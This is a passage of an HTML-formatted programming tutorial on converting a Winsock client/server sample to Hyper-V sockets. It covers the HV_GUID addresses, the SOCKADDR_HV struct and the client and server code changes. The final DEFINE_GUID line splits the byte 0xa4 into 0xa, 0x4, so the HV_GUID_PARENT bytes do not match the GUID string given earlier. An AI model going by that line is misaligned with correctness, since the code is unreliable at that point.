<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_ZERO, HV_GUID_WILDCARD</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000-0000-0000-0000-000000000000</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Listeners should bind to this VmId to accept connection from all partitions.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_BROADCAST</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wildcard address for children. Listeners should bind to this VmId to accept connection from its children.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_LOOPBACK</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">e0e16197-dd56-4a10-9195-5ee7a155a838</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Loopback address. Using this VmId connects to the same partition as the connector.</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a42e7cda-d03f-480c-9cc2-a4de20abb878</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.75pt 0pt 5.75pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Parent address. Using this VmId connects to the parent partition of the connector.*</span></div>
</td></tr>
</tbody></table>
</div>
<br />
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But not define </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">constant. Value </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">is 1</span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Now we change code in client:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1. </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: xx-small;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Add definitions:</span></span> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">struct</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ADDRESS_FAMILY</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Family;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">USHORT</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Reserved;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VmId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ServiceId;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">};</span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Define GUIDs</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#include</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><combaseapi.h></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{a42e7cda-d03f-480c-9cc2-a4de20abb878}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">; </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// HV_PARENT_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &VmID);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{b1d00d3e-fe10-4570-ad62-7648779d7a1b}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Service, generated by powershell</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//configure protocol</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&clientService, </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(clientService));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.Family = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.VmId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *vmId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.ServiceId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *serviceId;</span></div>
<br />
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Change protocol parameters:</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_family = </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_socktype = </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCK_STREAM</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_protocol = </span><span style="background-color: transparent; color: #6f008a; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Comment getaddrinfo block.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replace socket connection string</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); old code</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ConnectSocket = socket(hints.ai_family, hints.ai_socktype, hints.ai_protocol);</span></div>
<ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Comment Stop() function and its calls</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Server code:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Add GUIDS</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DEFINE_GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(HV_GUID_PARENT,0xa42e7cda,0xd03f,0x480c, 0x9c, 0xc2, 0xa, 0x4, 0xde, 0x20, 0xab, 0xb8, 0x78);</span></div>
